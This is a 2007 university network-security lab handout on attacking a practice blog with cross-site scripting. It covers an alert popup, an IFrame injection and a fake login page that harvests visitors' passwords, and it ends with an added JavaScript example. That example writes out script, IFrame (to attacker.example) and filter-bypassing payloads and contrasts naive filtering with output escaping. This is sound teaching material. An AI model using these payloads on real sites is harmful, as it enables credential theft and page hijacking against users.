Remote Human Exploitation: Attack a Forum using Cross Site Scripting | ECPE 178, Lab Reports of Cryptography and System Security

Material Type: Lab; Class: Computer Network Security (ECPE 178); Subject: Electrical & Computer Engineering; University: University of the Pacific; Term: Fall 2007;

Typology: Lab Reports

Pre 2010

Uploaded on 08/19/2009

Uploaded by koofers-user-vh7 (11 pages)
LAB #12

Your assignment, should you choose to accept it…

12/20/2007

If any of your force be killed or captured, the secretary will disavow any knowledge of your actions... this tape will self destruct in 5 seconds... Good Luck, Jim

Remote/human exploitation: Attack a forum using cross-site scripting (XSS)


Scenario

You have a remote target, a popular forum website that your human targets use to post comments to one another. Your task is to use XSS to modify that site in a way that tricks your targets into giving you information. Barring that, at least let the site owner know there's a problem by inserting an alert popup.

Choose your target:

  • http://www.jkandtc.com/blog (everyone shares, fighting each other!)
  • or http://www.jkandtc.com/n/blog (yours to do whatever!)

where n = your laptop number (01, 02, 03, etc.)

Potential Show Stoppers

  1. The site creator must not filter user input.
  2. Your IP address will be logged.

Log into: www.jkandtc.com/<pc-num>
For example: www.jkandtc.com/01
Then click on "Blog".

Inserting Javascript that creates a pop-up…

[Screenshot: what appears after the pop-up is closed]

[Screenshot: attacker's "comment"]

An IFrame XSS Attack

Now, let's perform an IFrame injection attack against a very popular website (e.g. YouTube). The attacker injects his complete malicious website into the popular site!

[Screenshot: attacker's "comment"]

Use W2000 IP

Let's be Sysadmin

Here, we insert the login page at the attacker's website – if the victim falls for it, the attacker gets the blog visitor's username and password….
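Worked example, added to this lab write-up and not part of the original slides: a minimal comment renderer in JavaScript that shows why show stopper #1 ("the site creator must not filter user input") is a weaker condition than it sounds. A blog that "filters" by stripping <script> tags still lets the IFrame payload through unchanged, and a split-tag payload reassembles into <script> after a single strip pass; only escaping at output time stops the alert popup, the IFrame injection and the fake-login IFrame alike. Everything below is constructed for the example: the renderer functions, the payload strings and the attacker.example host are assumptions, and nothing here targets the lab site.

```javascript
// Added example, not code from the ECPE 178 lab. The renderers, payloads and
// the "attacker.example" host are assumptions constructed for illustration.

// Payloads of the three kinds the lab walks through (constructed here).
const ALERT_PAYLOAD  = '<script>alert("XSS")</script>';
const IFRAME_PAYLOAD = '<iframe src="http://attacker.example/login" width="100%" height="600"></iframe>';
// Built to survive a filter that strips "<script>" tags once, non-recursively:
// after one pass the outer fragments close up into a real <script> element.
const NESTED_PAYLOAD = '<scr<script>ipt>alert(1)</scr</script>ipt>';

// Vulnerable renderer: the untrusted comment body is concatenated straight into
// the page markup, so any tag the attacker posts is interpreted by the browser.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// What "filtering user input" usually looks like in practice: strip <script>
// tags in a single pass. IFrames, event handlers and split tags pass through.
function naiveScriptFilter(body) {
  return body.replace(/<\/?script[^>]*>/gi, '');
}

// Hardened renderer: HTML-escape every metacharacter at output time, so the
// payload is displayed as text no matter what the attacker wrote.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Static stand-in for "would the browser execute this?": an active element,
// an inline event handler attribute, or a javascript: URL in the final markup.
function containsActiveMarkup(html) {
  return /<(script|iframe|object|embed)\b/i.test(html)
    || /\son[a-z]+\s*=/i.test(html)
    || /javascript:/i.test(html);
}

// Run each payload through each renderer and report which ones stay live.
function demo() {
  const results = {};
  const payloads = { ALERT_PAYLOAD, IFRAME_PAYLOAD, NESTED_PAYLOAD };
  for (const [name, payload] of Object.entries(payloads)) {
    results[name] = {
      unsafe:   containsActiveMarkup(renderCommentUnsafe('mallory', payload)),
      filtered: containsActiveMarkup(renderCommentUnsafe('mallory', naiveScriptFilter(payload))),
      escaped:  containsActiveMarkup(renderCommentSafe('mallory', payload)),
    };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(demo());
}
```

Run with node. The table shows the alert payload neutralised by the naive filter while the IFrame and split-tag payloads remain live; only the escaping renderer reports all three as inert. containsActiveMarkup only recognises the tags and attributes used here and is a stand-in for the browser, not a general XSS detector; the point of the lab's first show stopper is that a blocklist filter on input is not the same as encoding on output.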